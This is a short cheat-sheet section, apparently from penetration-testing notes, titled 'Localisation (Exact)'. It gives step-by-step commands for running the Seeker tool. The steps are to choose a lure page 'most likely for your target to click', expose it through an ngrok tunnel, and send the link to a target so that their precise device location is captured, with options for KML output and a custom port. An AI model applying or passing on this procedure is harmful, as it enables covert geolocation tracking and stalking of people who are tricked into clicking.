
## Localisation (Exact)

```
# Step 1 : In first terminal
$ python3 seeker.py

# Step 2 : Select the options (Most likely for your target to click)

# Step 3 : In second terminal start a tunnel service such as ngrok
$ ./ngrok http 8080

# Step 4 : Sent ngrok link to target

###########
# Options #
###########

# Ouput KML File for Google Earth
$ python3 seeker.py -k <filename>

# Use Custom Port
$ python3 seeker.py -p 1337
$ ./ngrok http 1337
```


## More Information

More information ---> https://github.com/thewhiteh4t/seeker
